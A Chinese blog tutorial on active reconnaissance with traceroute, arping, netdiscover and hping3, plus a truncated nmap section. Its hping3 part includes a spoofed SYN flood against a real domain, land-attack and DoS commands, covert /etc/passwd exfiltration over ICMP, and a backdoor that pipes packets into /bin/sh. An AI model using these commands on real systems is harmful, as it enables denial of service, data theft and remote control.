<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>主动信息收集 | 拾音</title><meta name="keywords" content="信息收集"><meta name="author" content="拾音"><meta name="copyright" content="拾音"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="二、主动信息收集traceroute查看路由 traceroute www 通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径。当然每次数据包由某一同样的出发点（source）到达某一同样的目的地(destination)走的路径可能会不一样，但基本上来说大部分时候所走的路由是相同的。 12345678910111213141516traceroute host">
<meta property="og:type" content="article">
<meta property="og:title" content="主动信息收集">
<meta property="og:url" content="https://blackfootedcat.github.io/2021/07/15/%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html">
<meta property="og:site_name" content="拾音">
<meta property="og:description" content="二、主动信息收集traceroute查看路由 traceroute www 通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径。当然每次数据包由某一同样的出发点（source）到达某一同样的目的地(destination)走的路径可能会不一样，但基本上来说大部分时候所走的路由是相同的。 12345678910111213141516traceroute host">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715113016809.png">
<meta property="article:published_time" content="2021-07-15T03:27:01.000Z">
<meta property="article:modified_time" content="2021-07-15T03:30:51.450Z">
<meta property="article:author" content="拾音">
<meta property="article:tag" content="信息收集">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715113016809.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://blackfootedcat.github.io/2021/07/15/%E4%B8%BB%E5%8A%A8%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css" media="print" onload="this.media='all'"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '天',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: {"limitCount":50,"languages":{"author":"作者: 拾音","link":"链接: ","source":"来源: 拾音","info":"著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。"}},
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#121212","position":"bottom-left"},
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}

// https://stackoverflow.com/questions/16839698/jquery-getscript-alternative-in-native-javascript
const getScript = url => new Promise((resolve, reject) => {
  const script = document.createElement('script')
  script.src = url
  script.async = true
  script.onerror = reject
  script.onload = script.onreadystatechange = function() {
    const loadState = this.readyState
    if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
    script.onload = script.onreadystatechange = null
    resolve()
  }
  document.head.appendChild(script)
})</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2021-07-15 11:30:51'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
   if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }
  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified
    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
   if (asideStatus === 'hide') {
     document.documentElement.classList.add('hide-aside')
   } else {
     document.documentElement.classList.remove('hide-aside')
   }
}})()</script><meta name="generator" content="Hexo 5.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="author-avatar"><img class="avatar-img" src="/img/my.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">78</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">39</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">8</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 杂项</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> 杂记</span></a></li><li><a class="site-page" href="/movie/"><i class="fa-fw fas fa-video"></i><span> 待续</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard"><i class="fa-fw fa fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(http://aliyunhexopic.oss-cn-beijing.aliyuncs.com/img/image-20210715113016809.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">拾音</a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 杂项</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> 杂记</span></a></li><li><a class="site-page" href="/movie/"><i class="fa-fw fas fa-video"></i><span> 待续</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/messageboard"><i class="fa-fw fa fa-paper-plane"></i><span> 留言板</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">主动信息收集</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-15T03:27:01.000Z" title="发表于 2021-07-15 11:27:01">2021-07-15</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-07-15T03:30:51.450Z" title="更新于 2021-07-15 11:30:51">2021-07-15</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">4.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>16分钟</span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="二、主动信息收集"><a href="#二、主动信息收集" class="headerlink" title="二、主动信息收集"></a>二、主动信息收集</h1><h2 id="traceroute"><a href="#traceroute" class="headerlink" title="traceroute"></a>traceroute</h2><p><strong>查看路由</strong></p>
<p>traceroute www</p>
<p>通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径。当然每次数据包由某一同样的出发点（source）到达某一同样的目的地(destination)走的路径可能会不一样，但基本上来说大部分时候所走的路由是相同的。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">traceroute hostname</span><br><span class="line">-d 使用Socket层级的排错功能。</span><br><span class="line">-f 设置第一个检测数据包的存活数值TTL的大小。</span><br><span class="line">-F 设置勿离断位。</span><br><span class="line">-g 设置来源路由网关，最多可设置8个。</span><br><span class="line">-i 使用指定的网络界面送出数据包。</span><br><span class="line">-I 使用ICMP回应取代UDP资料信息。</span><br><span class="line">-m 设置检测数据包的最大存活数值TTL的大小。</span><br><span class="line">-n 直接使用IP地址而非主机名称。</span><br><span class="line">-p 设置UDP传输协议的通信端口。</span><br><span class="line">-r 忽略普通的Routing Table，直接将数据包送到远端主机上。</span><br><span class="line">-s 设置本地主机送出数据包的IP地址。</span><br><span class="line">-t 设置检测数据包的TOS数值。</span><br><span class="line">-v 详细显示指令的执行过程。</span><br><span class="line">-w 设置等待远端主机回报的时间。</span><br><span class="line">-x 开启或关闭数据包的正确性检验。</span><br></pre></td></tr></table></figure>
<h2 id="ARPING"><a href="#ARPING" class="headerlink" title="ARPING"></a>ARPING</h2><p><strong>arping命令</strong> 是用于发送arp请求到一个相邻主机的工具，arping使用arp数据包，通过ping命令检查设备上的硬件MAC地址。能够测试一个ip地址是否是在网络上已经被使用，并能够获取更多设备信息。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sudo arping 192.168.84.2 </span><br><span class="line">-b：用于发送以太网广播帧（FFFFFFFFFFFF）。arping一开始使用广播地址，在收到响应后就使用unicast地址。</span><br><span class="line">-q：quiet output不显示任何信息；</span><br><span class="line">-f：表示在收到第一个响应报文后就退出；</span><br><span class="line">-w timeout：设定一个超时时间，单位是秒。如果到了指定时间，arping还没到完全收到响应则退出；</span><br><span class="line">-c count：表示发送指定数量的ARP请求数据包后就停止。如果指定了deadline选项，则arping会等待相同数量的arp响应包，直到超时为止；</span><br><span class="line">-s source：设定arping发送的arp数据包中的SPA字段的值。如果为空，则按下面处理，如果是DAD模式（冲突地址探测），</span><br><span class="line">	则设置为0.0.0.0，如果是Unsolicited ARP模式（Gratutious ARP）则设置为目标地址，否则从路由表得出；</span><br><span class="line">-I interface：设置ping使用的网络接口。</span><br></pre></td></tr></table></figure>
<h2 id="netdiscover"><a href="#netdiscover" class="headerlink" title="netdiscover"></a>netdiscover</h2><p>netdiscover 是用来在二层去发现其他主机的，在命令执行的过程中可以通过 wireshark 查看是基于 arp 协议。netdiscover 分为两种模式，一种是主动发现，一种是被动发现。不带参数默认是主动模式，发的是 arp 的包，且是 0/16 范围。通过 - i 参数来指定网卡设备，通过 - r 参数来指定要扫描的网段，很多公司都有各种防护设备监控设备，如果利用 arp 去做主动发现，很容易报警，如果检测到封掉了自己这个机器，则不利于后面渗透工作的进行，所以这里可以使用 netdiscover 的被动模式，其命令是 - p</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">sudo netdiscover -i eth0 -r 192.168.84.0/24</span><br><span class="line"></span><br><span class="line">-i device：您的网络设备</span><br><span class="line">-r range：扫描给定范围而不是自动扫描。 192.168.6.0/24,/16,/8</span><br><span class="line">-l file：扫描包含在给定文件中</span><br><span class="line">-p passive mode 被动模式，不要发任何东西，只是嗅探</span><br><span class="line">-m file：扫描已知MAC和主机名的列表</span><br><span class="line">-F filter：自定义pcap filterExpression（默认值：“arp”）</span><br><span class="line">-s time：每个arp请求之间的睡眠时间（毫秒）</span><br><span class="line">-n node：用于扫描的最后一个ip八位字节（从2到253）</span><br><span class="line">-c count：发送每个arp请求的次数（对于具有丢包的网络）</span><br><span class="line">-f：启用快速模式扫描，节省大量时间，推荐用于自动</span><br><span class="line">-d：忽略家庭配置文件进行自动扫描和快速模式</span><br><span class="line">-S：启用每个请求之间的睡眠时间抑制（硬核模式）</span><br><span class="line">-P：以适合其他程序解析的格式打印</span><br><span class="line">-N：不要打印头。仅当-P启用时有效。</span><br><span class="line">-L：到可解析输出模式（-P），继续监听主动扫描完成</span><br></pre></td></tr></table></figure>
<h2 id="HPING3"><a href="#HPING3" class="headerlink" title="HPING3"></a>HPING3</h2><p><a target="_blank" rel="noopener" href="https://wangchujiang.com/linux-command/c/hping3.html">https://wangchujiang.com/linux-command/c/hping3.html</a></p>
<p>web服务作压力测试  也可以进行DOS</p>
<p>防火墙测试 </p>
<p>实用的端口扫描 </p>
<p>网络检测，可以用不同的协议、服务类型（TOS）、IP分片 </p>
<p>手工探测MTU（最大传输单元）路径 </p>
<p>先进的路由跟踪，支持所有的协议 </p>
<p>远程操作系统探测 </p>
<p>远程的运行时间探测 </p>
<p>TCP/IP堆栈审计 </p>
<p><strong>攻击实验 每次扫描一个目标</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line">hping3 -c 1000    //1000个数据</span><br><span class="line">			-d 120    //每个数据包大小 kb</span><br><span class="line">			-S  n   //发出SYN数据包</span><br><span class="line">			-w 64    //TCP窗口大小</span><br><span class="line">			-p 80	//目标端口</span><br><span class="line">			--flood	//不考虑回复 洪水攻击</span><br><span class="line">			--rand-source 	//随机地址</span><br><span class="line">			baidu.com</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">-H --help 显示帮助。</span><br><span class="line">-v -VERSION 版本信息。</span><br><span class="line">-c --count count 发送数据包的次数 关于countreached_timeout 可以在hping2.h里编辑。</span><br><span class="line">-i --interval 包发送间隔时间（单位是毫秒）缺省时间是1秒,此功能在增加传输率上很重要,在idle/spoofing扫描时此功能也会被用到,你可以参考hping-howto获得更多信息-fast 每秒发10个数据包。</span><br><span class="line">-n -nmeric 数字输出，象征性输出主机地址。</span><br><span class="line">-q -quiet 退出。</span><br><span class="line">-I --interface interface name 无非就是eth0之类的参数。</span><br><span class="line">-v --verbose 显示很多信息，TCP回应一般如：</span><br><span class="line">len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 </span><br><span class="line">ack=1380893504 sum=2010 urp=0</span><br><span class="line">-D --debug 进入debug模式当你遇到麻烦时，比如用HPING遇到一些不合你习惯的时候，</span><br><span class="line">你可以用此模式修改HPING，（INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.......）</span><br><span class="line">-z --bind 快捷键的使用。</span><br><span class="line">-Z --unbind 消除快捷键。</span><br><span class="line">-O --rawip RAWIP模式，在此模式下HPING会发送带数据的IP头。</span><br><span class="line">-1 --icmp ICMP模式，此模式下HPING会发送IGMP应答报，你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。</span><br><span class="line">-2 --udp UDP 模式，缺省下，HPING会发送UDP报文到主机的0端口，你可以用--baseport --destport --keep选项指定其模式。</span><br><span class="line">-9 --listen signatuer hping的listen模式，用此模式，HPING会接收指定的数据。</span><br><span class="line">-a --spoof hostname 伪造IP攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了。</span><br><span class="line">-t --ttl time to live 可以指定发出包的TTL值。</span><br><span class="line">-H --ipproto 在RAW IP模式里选择IP协议。</span><br><span class="line">-w --WINID UNIX ,WINDIWS的id回应不同的，这选项可以让你的ID回应和WINDOWS一样。</span><br><span class="line">-r --rel 更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。</span><br><span class="line">-F --FRAG 更改包的FRAG，这可以测试对方对于包碎片的处理能力，缺省的“virtual mtu”是16字节。</span><br><span class="line">-x --morefrag 此功能可以发送碎片使主机忙于恢复碎片而造成主机的拒绝服务。</span><br><span class="line">-y -dontfrag 发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY。</span><br><span class="line">-G --fragoff fragment offset value set the fragment offset</span><br><span class="line">-m --mtu mtu value 用此项后ID数值变得很大，50000没指定此项时3000-20000左右。</span><br><span class="line">-G --rroute 记录路由，可以看到详悉的数据等等，最多可以经过9个路由，即使主机屏蔽了ICMP报文。</span><br><span class="line">-C --ICMPTYPE type 指定ICMP类型，缺省是ICMP echo REQUEST。</span><br><span class="line">-K --ICMPCODE CODE 指定ICMP代号，缺省0。</span><br><span class="line">--icmp-ipver 把IP版本也插入IP头。</span><br><span class="line">--icmp-iphlen 设置IP头的长度，缺省为5（32字节）。</span><br><span class="line">--icmp-iplen 设置IP包长度。</span><br><span class="line">--icmp-ipid 设置ICMP报文IP头的ID，缺省是RANDOM。</span><br><span class="line">--icmp-ipproto 设置协议的，缺省是TCP。</span><br><span class="line">-icmp-cksum 设置校验和。</span><br><span class="line">-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)</span><br><span class="line">--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)</span><br><span class="line">-s --baseport source port hping 用源端口猜测回应的包，它从一个基本端口计数，每收一个包，端口也加1，这规则你可以自己定义。</span><br><span class="line">-p --deskport [+][+]desk port 设置目标端口，缺省为0，一个加号设置为:每发送一个请求包到达后，</span><br><span class="line">端口加1，两个加号为：每发一个包，端口数加1。</span><br><span class="line">--keep 上面说过了。</span><br><span class="line">-w --win 发的大小和windows一样大，64BYTE。</span><br><span class="line">-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.</span><br><span class="line">-m --tcpseq 设置TCP序列数。</span><br><span class="line">-l --tcpck 设置TCP ack。</span><br><span class="line">-Q --seqnum 搜集序列号的，这对于你分析TCP序列号有很大作用。</span><br></pre></td></tr></table></figure>
<h3 id="防火墙测试"><a href="#防火墙测试" class="headerlink" title="#  防火墙测试"></a>#  防火墙测试</h3><p>使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：<a target="_blank" rel="noopener" href="http://0daysecurity.com/articles/hping3_examples.html">http://0daysecurity.com/articles/hping3_examples.html</a></p>
<p>测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10</span><br></pre></td></tr></table></figure>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="# 端口扫描"></a># 端口扫描</h3><p>Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 -I eth0  -S 192.168.10.1 -p 80</span><br></pre></td></tr></table></figure>
<p>其中<code>-I eth0</code>指定使用eth0端口，<code>-S</code>指定TCP包的标志位SYN，<code>-p 80</code>指定探测的目的端口。</p>
<p>hping3支持非常丰富的端口探测方式，nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。</p>
<h3 id="Idle扫描"><a href="#Idle扫描" class="headerlink" title="# Idle扫描"></a># Idle扫描</h3><p>Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，目前Idle扫描在Nmap中也有实现。</p>
<p>该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。</p>
<h3 id="拒绝服务攻击"><a href="#拒绝服务攻击" class="headerlink" title="# 拒绝服务攻击"></a># 拒绝服务攻击</h3><p>使用Hping3可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000</span><br></pre></td></tr></table></figure>
<p>其他攻击如smurf、teardrop、land attack等也很容易构建出来。</p>
<h3 id="文件传输"><a href="#文件传输" class="headerlink" title="# 文件传输"></a># 文件传输</h3><p>Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。在接收端开启服务：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 192.168.1.159--listen signature --safe  --icmp</span><br></pre></td></tr></table></figure>
<p>监听ICMP包中的签名，根据签名解析出文件内容。</p>
<p>在发送端使用签名打包的ICMP包发送文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd</span><br></pre></td></tr></table></figure>
<p>将<code>/etc/passwd</code>密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。</p>
<h3 id="木马功能"><a href="#木马功能" class="headerlink" title="# 木马功能"></a># 木马功能</h3><p>如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。</p>
<p>示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。</p>
<p>在木马启动端：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh</span><br></pre></td></tr></table></figure>
<p>在远程控制端：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo ls &gt;test.cmd</span><br><span class="line">hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd</span><br></pre></td></tr></table></figure>
<p>将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。</p>
<p>当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。</p>
<h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><p>扫描网段</p>
<h3 id="全连接扫描"><a href="#全连接扫描" class="headerlink" title="全连接扫描"></a>全连接扫描</h3><p>nmap -sn 192.168.0/24</p>
<p>nmap -sn 192.168.0 -254</p>
